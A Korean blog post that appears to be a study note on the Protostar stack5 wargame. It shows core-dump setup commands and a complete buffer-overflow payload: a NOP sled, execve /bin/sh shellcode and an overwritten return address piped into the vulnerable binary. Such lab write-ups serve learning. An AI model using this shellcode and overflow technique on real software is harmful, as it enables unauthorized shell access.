protostar stack5

시스템 2025. 1. 28. 15:11

리마인드

다양한 방법을 시도하였으며, 결국 core dump 파일에 있는 0xbffffc40 주소로 ret 값 입력 시 정상적으로 쉘이 떨어진다. 

https://jennana.tistory.com/579

 

[Protostar] Stack5

[Protostar] Stack5 #include #include #include #include int main(int argc, char **argv) { char buffer[64]; gets(buffer); } 이 문제는 쉘코드를 삽입하고 ret를 쉘코드가 있는 위치로 변조하여 해결하는 문제이다. 코드를 보면,

jennana.tistory.com

 

core 덤프 확인을 위해 아래와 같이 설정 

$ cat /proc/sys/kernel/core_pattern
/tmp/core.%s.%e.%p
# cat /proc/sys/fs/suid_dumpable
0
# echo "1" > /proc/sys/fs/suid_dumpable
# cat /proc/sys/fs/suid_dumpable
1
$ ulimit -c unlimited

 

최종 삽입코드 : NOP(16) + 쉘코드(24) + NOP(36) + RET(4) = 80 

(python -c 'print "\x90"*16+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*36+"\x40\xfc\xff\xbf"';cat) | ./stack5

 

추가 참고)

https://noobfrompitt.github.io/protostar-stack5/

 

 

 

 

'시스템' 카테고리의 다른 글

protostar format2  (0) 2025.01.29
protostar format1  (0) 2025.01.28
protostar stack2  (0) 2025.01.27
Buffer OverFlow 대응방안  (0) 2022.10.24
Init 프로세스  (0) 2022.10.23
블로그 이미지

wtdsoul

,